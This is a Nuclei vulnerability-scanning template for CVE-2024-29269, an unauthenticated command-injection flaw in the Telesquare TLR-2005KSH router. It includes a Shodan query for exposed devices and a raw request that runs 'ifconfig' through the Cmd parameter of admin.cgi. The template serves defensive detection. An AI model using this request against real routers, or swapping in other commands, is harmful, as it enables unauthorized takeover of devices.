nuclei-templates/http/cves/2024/CVE-2024-29269.yaml

51 lines
1.7 KiB
YAML

id: CVE-2024-29269
info:
name: Telesquare TLR-2005KSH - Remote Command Execution
author: ritikchaddha
severity: critical
description: |
Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.
reference:
- https://github.com/wutalent/CVE-2024-29269/blob/main/index.md
- https://gist.github.com/win3zz/c26047ae4b182c3619509d537b808d2b
- https://github.com/Ostorlab/KEV
- https://github.com/YongYe-Security/CVE-2024-29269
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-29269
epss-score: 0.00054
epss-percentile: 0.21518
metadata:
max-request: 1
shodan-query: title:"Login to TLR-2005KSH"
tags: cve,cve2024,telesquare,tlr,rce
http:
- raw:
- |
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<CmdResult>'
- '</xml>'
- 'Ethernet'
- 'inet'
condition: and
- type: word
part: header
words:
- 'text/xml'
- type: status
status:
- 200
# digest: 4a0a0047304502202588a25e1042a61777bdb84f557b67a9f93b51713a37c41b28d81bbedf12324b022100c4770f328e89c8c133189d9c7d74131d77f77ea05e218d41dd03e4917674b2ef:922c64590222798bb761d5b6d8e72950